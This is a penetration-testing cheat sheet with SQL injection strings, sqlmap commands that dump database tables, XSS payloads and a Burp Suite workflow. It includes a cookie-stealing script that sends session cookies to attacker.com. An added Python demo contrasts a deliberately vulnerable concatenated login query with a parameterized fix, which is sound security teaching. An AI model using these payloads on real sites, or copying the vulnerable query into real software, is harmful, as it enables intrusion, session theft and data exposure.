
WEB APPLICATION PENTESTING

SQL Injection

# Manual testing
' OR '1'='1
admin' --
' UNION SELECT NULL--

# SQLMap
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database --tables
sqlmap -u "http://target.com/page.php?id=1" -D database -T users --dump
sqlmap -u "http://target.com/login" --data="user=admin&pass=admin"
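
Added example, not part of the original cheat sheet: it shows why the three manual test strings above succeed against a login query built by string concatenation and fail against a parameterized one, which is the fix to recommend in a report. The table, credentials and function names are constructed for illustration, and SQLite is assumed as the backend.

```python
import sqlite3

def make_db():
    # Constructed sample data; plaintext password only to keep the demo short
    # (a real application stores a salted password hash).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def login_vulnerable(db, user, pw):
    # Deliberately vulnerable: user input becomes part of the SQL text,
    # so quotes and comment markers in the input change the query structure.
    sql = ("SELECT username FROM users "
           "WHERE username = '%s' AND password = '%s'" % (user, pw))
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # malformed SQL after injection counts as a failed login

def login_safe(db, user, pw):
    # Hardened: placeholders keep input as data; it is never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (user, pw)).fetchone() is not None

# (username field, password field) pairs using the strings from this page
PAYLOADS = [
    ("x", "' OR '1'='1"),            # OR clause makes the WHERE always true
    ("admin' --", "x"),              # comment removes the password check
    ("' UNION SELECT NULL--", "x"),  # UNION appends a row to an empty result
]

def compare(db):
    # Returns one (vulnerable_result, safe_result) pair per payload
    return [(login_vulnerable(db, u, p), login_safe(db, u, p))
            for u, p in PAYLOADS]

if __name__ == "__main__":
    db = make_db()
    for (u, p), (vuln, safe) in zip(PAYLOADS, compare(db)):
        print(f"user={u!r} pass={p!r} vulnerable={vuln} parameterized={safe}")
```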

XSS (Cross-Site Scripting)

# Basic payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

# Cookie stealing
<script>document.location='http://attacker.com/steal.php?c='+document.cookie</script>

# XSStrike
xsstrike -u "http://target.com/search?q=test"

Burp Suite Workflow

# Proxy: 127.0.0.1:8080

1. Intercept requests
2. Modify and replay with Repeater
3. Fuzz with Intruder
4. Scan for vulnerabilities
5. Use Spider to map application